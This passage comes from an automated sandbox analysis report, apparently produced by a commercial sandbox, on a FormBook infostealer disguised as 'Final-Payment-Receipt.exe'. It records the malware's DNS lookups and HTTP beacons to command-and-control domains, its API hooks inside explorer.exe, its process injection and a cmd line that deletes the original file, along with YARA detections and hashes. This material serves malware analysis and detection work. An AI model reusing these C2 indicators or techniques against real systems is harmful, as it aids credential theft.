                                              Nov 19, 2020 22:20:18.300740004 CET53503948.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:26.929465055 CET5853053192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:26.968744040 CET53585308.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:47.608442068 CET5381353192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:47.664834976 CET53538138.8.8.8192.168.2.5
                                              Nov 19, 2020 22:20:49.144931078 CET6373253192.168.2.58.8.8.8
                                              Nov 19, 2020 22:20:49.172059059 CET53637328.8.8.8192.168.2.5
                                              Nov 19, 2020 22:21:08.422624111 CET5734453192.168.2.58.8.8.8
                                              Nov 19, 2020 22:21:08.462667942 CET53573448.8.8.8192.168.2.5
                                              Nov 19, 2020 22:21:28.816133976 CET5445053192.168.2.58.8.8.8
                                              Nov 19, 2020 22:21:28.857445955 CET53544508.8.8.8192.168.2.5

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 19, 2020 22:20:17.573630095 CET192.168.2.58.8.8.80xc1b0Standard query (0)g.msn.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:26.929465055 CET192.168.2.58.8.8.80x34c1Standard query (0)www.wacrox.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:47.608442068 CET192.168.2.58.8.8.80x15ecStandard query (0)www.trumpingitagain.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:08.422624111 CET192.168.2.58.8.8.80x4070Standard query (0)www.azarblock.comA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.816133976 CET192.168.2.58.8.8.80x82a5Standard query (0)www.themindofafunnygirl.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 19, 2020 22:20:17.624994993 CET8.8.8.8192.168.2.50xc1b0No error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:20:26.968744040 CET8.8.8.8192.168.2.50x34c1No error (0)www.wacrox.com162.0.236.49A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET8.8.8.8192.168.2.50x15ecNo error (0)www.trumpingitagain.comtrumpingitagain.comCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:20:47.664834976 CET8.8.8.8192.168.2.50x15ecNo error (0)trumpingitagain.com27.123.27.33A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:08.462667942 CET8.8.8.8192.168.2.50x4070Name error (3)www.azarblock.comnonenoneA (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)www.themindofafunnygirl.comthemindofafunnygirl.comCNAME (Canonical name)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)themindofafunnygirl.com192.0.78.230A (IP address)IN (0x0001)
                                              Nov 19, 2020 22:21:28.857445955 CET8.8.8.8192.168.2.50x82a5No error (0)themindofafunnygirl.com192.0.78.148A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.wacrox.com
                                              • www.trumpingitagain.com
                                              • www.themindofafunnygirl.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.549730162.0.236.4980C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:20:27.149298906 CET5719OUTGET /71m/?Rzr0iD=xuMbXRqvcjTkPYem20N3vsgWyUob49TNzNry+QjPYNTyHJJexkEaphWMorU+NKluO0/a&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.wacrox.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:27.391788006 CET5720INHTTP/1.1 404 Not Found
                                              Date: Thu, 19 Nov 2020 21:20:27 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 327
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 37 31 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /71m/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.54973127.123.27.3380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:20:47.953753948 CET5721OUTGET /71m/?Rzr0iD=gir/TGf45q640hyvaYoOLmcQvbxfbyF+CK0IasCqTcsJdBCY+OvZ/ZhMnEHJcPXMDgdk&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.trumpingitagain.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:20:48.246388912 CET5721INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:20:48 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 315
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.549733192.0.78.23080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 19, 2020 22:21:28.875543118 CET5733OUTGET /71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr HTTP/1.1
                                              Host: www.themindofafunnygirl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Nov 19, 2020 22:21:28.891923904 CET5733INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Thu, 19 Nov 2020 21:21:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 162
                                              Connection: close
                                              Location: https://themindofafunnygirl.com/71m/?Rzr0iD=rhJBnfA/e5RktQ98+ow2gk+rbfXq49mIcD+nNtl3IG/t9WffOOBTTAV63Ad5zEG8kC/4&ZL3=rVvxt090-21lhr
                                              X-ac: 2.hhn
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function NameHook TypeActive in Processes
                                              PeekMessageAINLINEexplorer.exe
                                              PeekMessageWINLINEexplorer.exe
                                              GetMessageWINLINEexplorer.exe
                                              GetMessageAINLINEexplorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function NameHook TypeNew Data
                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE
                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                                              GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: Final-Payment-Receipt.exe PID: 1692 Parent PID: 5576

                                              General

                                              Start time:22:19:28
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x10000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: Final-Payment-Receipt.exe PID: 5764 Parent PID: 1692

                                              General

                                              Start time:22:19:31
                                              Start date:19/11/2020
                                              Path:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\Desktop\Final-Payment-Receipt.exe
                                              Imagebase:0x8d0000
                                              File size:552448 bytes
                                              MD5 hash:8F5D29001A9F5D4F62B47AF6442BE5AB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 3472 Parent PID: 5764

                                              General

                                              Start time:22:19:33
                                              Start date:19/11/2020
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff693d90000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: wlanext.exe PID: 4732 Parent PID: 3472

                                              General

                                              Start time:22:19:41
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\wlanext.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\wlanext.exe
                                              Imagebase:0xe10000
                                              File size:78848 bytes
                                              MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              Analysis Process: cmd.exe PID: 5932 Parent PID: 4732

                                              General

                                              Start time:22:19:46
                                              Start date:19/11/2020
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
                                              Imagebase:0x150000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: conhost.exe PID: 1132 Parent PID: 5932

                                              General

                                              Start time:22:19:47
                                              Start date:19/11/2020
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7ecfc0000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >